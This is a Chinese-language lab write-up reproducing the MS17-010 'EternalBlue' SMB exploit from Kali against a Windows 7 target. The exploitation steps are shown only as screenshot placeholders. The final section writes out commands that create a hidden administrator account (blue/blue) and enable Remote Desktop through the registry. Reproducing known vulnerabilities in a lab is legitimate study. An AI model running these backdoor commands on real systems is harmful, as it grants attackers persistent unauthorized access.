[漏洞复现] MS17-010 基于"永恒之蓝"实现Windows Getshell

1、漏洞简介

MS17-010(永恒之蓝)应用的不仅仅是一个漏洞,而是包含Windows SMB 远程代码执行漏洞CVE-2017-0143、CVE-2017-0144、CVE-2017-0145、CVE-2017-0146、CVE-2017-0147、CVE-2017-0148在内的6个SMB漏洞。
漏洞的原理可参考https://www.cnblogs.com/Qujinkongyuyin/p/9266958.html
WannaCry勒索病毒,黑客拿着美国安全局泄露的永恒之蓝攻击代码进行研制,并进行大肆勒索传播。

2、复现环境

  • 渗透机 kali 2019.3 ip:192.168.43.177
  • 耙机 win7 sp1 ip:192.168.43.196

3、实验步骤

3.1检索利用模块

image.png

3.2 扫描目标是否含有该漏洞

image.png

3.3 漏洞利用

image.png

3.4 getshell

image.png

3.5 创建用户开启远程桌面

创建用户名密码 blue/blue
net user blue blue /add
将用户blue添加入管理组
net localgroup administrators blue /add
开启远程桌面功能
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 0 /f
使用mstsc进行远程

参考资料

https://mp.weixin.qq.com/s?__biz=MzI5ODU1MjIwMg==&mid=2247484114&idx=1&sn=c616b9dac3fa71cdb8705e2eb6227979&chksm=eca55c37dbd2d521a34a254e34febded27a297240719a9973840dc863b1ea011f23b565640bf&scene=21#wechat_redirect

你可能感兴趣的:([漏洞复现] MS17-010 基于"永恒之蓝"实现Windows Getshell)